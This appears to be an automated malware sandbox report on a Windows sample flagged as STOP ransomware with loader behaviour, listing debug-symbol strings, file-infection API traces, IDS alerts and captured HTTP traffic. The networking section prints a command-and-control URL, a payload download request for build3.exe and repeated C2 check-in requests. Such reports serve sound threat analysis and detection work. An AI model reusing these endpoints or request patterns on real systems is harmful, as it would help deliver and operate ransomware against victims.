              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\mp source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2289759297.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283628398.00000000037EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253827941.0000000003B5B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303180296.0000000003B63000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2303090590.0000000003B33000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2243108340.00000000037E0000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220175784.00000000037D5000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2309605483.0000000003C03000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\G source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003BC2000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbAppCache133521717815553933.txt source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193490416.0000000003889000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.0000000003868000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\a\Adobe source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2307032811.0000000003BF2000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\L source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb`6 source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242821627.0000000003B57000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B4B000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: ad_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\a\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283575047.000000000395A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2283443210.0000000003913000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1923906292.0000000003366000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\he\= source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003C05000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285406721.0000000003BDB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284252311.0000000003BC3000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\C:\U source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1960744215.0000000003391000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241431328.000000000393D000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\we\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242273475.0000000003864000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242219779.0000000003807000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\s source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2284786483.000000000388C000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261008047.0000000003881000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285842625.00000000038B9000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2285127937.0000000003899000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\" source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2299293473.0000000003C9E000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\x source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2253587616.0000000003B92000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2262926457.0000000003BA3000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2261615896.0000000003B92000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218928019.0000000003924000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193290817.00000000038EE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2221073589.000000000394A000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220505539.000000000392F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2218644067.00000000038EA000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\[ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\e\ source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219793870.00000000033B4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Snz source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2241580855.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193886000.00000000037DA000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193703978.00000000037BE000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242013730.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219190417.00000000037BC000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219510848.00000000037F4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2242573181.00000000037F8000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\t source: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219677966.000000000339D000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219600233.000000000337F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193832137.000000000339F000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2220925314.00000000033AB000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2193661261.000000000338E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2219724581.00000000033A8000.00000004.00000020.00020000.00000000.sdmp

              Spreading

              barindex
              Infects executable files (exe, dll, sys, html)
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeSystem file written: C:\Users\user\AppData\Local\Temp\chrome.exeJump to behavior
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F20160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,0_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,0_2_00F1FB98
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F1F730
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F20160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,2_2_00F20160
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 2_2_00F1FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,2_2_00F1FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F10160 Sleep,PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,3_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 3_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,3_2_00F0FB98
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F10160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F10160
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,4_2_00F0F730
              Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 4_2_00F0FB98 PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,FindNextFileW,FindClose,4_2_00F0FB98

              Networking

              barindex
              Snort IDS alert for network traffic
              Source: TrafficSnort IDS: 2036333 ET TROJAN Win32/Vodkagats Loader Requesting Payload 192.168.2.4:49732 -> 199.59.242.150:80
              Source: TrafficSnort IDS: 2020826 ET TROJAN Potential Dridex.Maldoc Minimal Executable Request 192.168.2.4:49732 -> 199.59.242.150:80
              Source: TrafficSnort IDS: 2833438 ETPRO TROJAN STOP Ransomware CnC Activity 192.168.2.4:49734 -> 199.59.242.150:80
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: http://zexeq.com/raud/get.php
              Source: Joe Sandbox ViewIP Address: 199.59.242.150 199.59.242.150
              Source: Joe Sandbox ViewIP Address: 199.59.242.150 199.59.242.150
              Source: Joe Sandbox ViewIP Address: 104.21.65.24 104.21.65.24
              Source: Joe Sandbox ViewASN Name: BODIS-NJUS BODIS-NJUS
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exeCode function: 0_2_00F1CF10 _memset,InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00F1CF10
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /geo.json HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: api.2ip.ua
              Source: global trafficHTTP traffic detected: GET /files/1/build3.exe HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.com
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637&first=true HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
              Source: global trafficHTTP traffic detected: GET /raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637 HTTP/1.1User-Agent: Microsoft Internet ExplorerHost: zexeq.comCookie: parking_session=2d74f0cd-4ff1-c273-33f1-f3f1126e798c
